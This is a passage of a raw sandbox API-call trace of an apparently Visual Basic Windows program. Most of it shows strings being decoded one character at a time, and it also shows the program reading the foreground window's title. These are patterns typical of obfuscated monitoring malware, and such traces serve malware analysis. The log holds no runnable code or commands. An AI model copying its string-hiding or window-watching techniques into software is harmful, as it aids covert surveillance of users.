lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0086.781] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[", lpUsedDefaultChar=0x0) returned 1 [0086.781] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0086.781] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0086.782] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0086.782] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N", lpUsedDefaultChar=0x0) returned 1 [0086.783] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0086.783] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c", lpUsedDefaultChar=0x0) returned 1 [0086.783] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0086.784] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.785] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.785] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.785] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.785] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0086.786] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0086.786] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.786] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.787] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.787] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.787] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.788] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.788] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.789] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.789] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.789] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.789] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.790] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.790] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.791] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.791] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0086.792] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0086.792] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.792] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.793] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.793] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.793] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0086.794] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0086.794] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.794] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.795] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.795] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.795] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.796] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.796] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.797] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.797] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.797] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.798] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.798] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.798] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.799] GetForegroundWindow () returned 0x102c2 [0086.799] GetLastError () returned 0x0 [0086.799] SysStringLen (param_1=" ") returned 0xff [0086.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0086.799] SysStringLen (param_1=" ") returned 0xff [0086.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0086.799] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0086.799] GetLastError () returned 0x0 [0086.800] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0086.800] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0086.800] SysStringLen (param_1="Activ") returned 0x5 [0086.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Activ", cchWideChar=6, lpMultiByteStr=0xe5705c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Activ", lpUsedDefaultChar=0x0) returned 6 [0086.800] SetWindowTextA (hWnd=0x2036e, lpString="Activ") returned 1 [0086.800] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x15 [0086.801] GetFocus () returned 0x0 [0086.801] lstrlenA (lpString="Activ") returned 5 [0086.801] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe5705c) returned 0x1 [0086.801] IsWindow (hWnd=0x2036e) returned 1 [0086.801] IsWindow (hWnd=0x2036e) returned 1 [0086.801] IsWindow (hWnd=0x2036e) returned 1 [0086.801] IsWindow (hWnd=0x2036e) returned 1 [0086.802] GetFocus () returned 0x0 [0086.802] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0086.802] GetFocus () returned 0x0 [0086.802] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x6) returned 0x310bcd0 [0086.802] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x6, lParam=0x310bcd0) returned 0x5 [0086.802] GetFocus () returned 0x0 [0086.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activ", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0086.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activ", cbMultiByte=-1, lpWideCharStr=0xe5705c, cchWideChar=6 | out: lpWideCharStr="Activ") returned 6 [0086.802] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0086.802] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0086.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_", lpUsedDefaultChar=0x0) returned 1 [0086.804] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0086.804] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0086.804] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0086.805] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t", lpUsedDefaultChar=0x0) returned 1 [0086.805] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0086.805] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.806] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.806] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.807] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.807] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0086.807] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0086.808] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.808] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.808] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.809] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.809] MultiByteToWideChar (in: CodePage=0x0, 